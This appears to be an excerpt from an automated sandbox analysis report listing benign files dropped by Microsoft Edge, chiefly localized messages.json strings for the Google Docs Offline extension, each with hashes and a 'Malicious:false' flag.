                                                                                                                                                                                                                                                                                                                  SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):972
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                                                                  MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                                                                  SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                                                                  SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                                                                  SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):990
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                                                                                  MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                                                                                  SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                                                                                  SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                                                                                  SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1658
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                                                                                  MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                                                                                  SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                                                                                  SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                                                                                  SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1672
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                                                                                  MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                                                                                  SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                                                                                  SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                                                                                  SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):935
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                                                                                  MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                                                                                  SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                                                                                  SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                                                                                  SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1065
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                                                                                  MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                                                                                  SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                                                                                  SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                                                                                  SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2771
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                                                                                  MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                                                                                  SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                                                                                  SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                                                                                  SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):858
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                                                                  MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                                                                  SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                                                                  SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                                                                  SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):954
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                                                                  MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                                                                  SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                                                                  SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                                                                  SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):899
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                                                                  MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                                                                  SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                                                                  SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                                                                  SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2230
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                                                                  MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                                                                  SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                                                                  SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                                                                  SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1160
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                                                                  MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                                                                  SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                                                                  SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                                                                  SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):3264
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                                                                  MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                                                                  SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                                                                  SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                                                                                  SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):3235
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                                                                  Encrypted:false
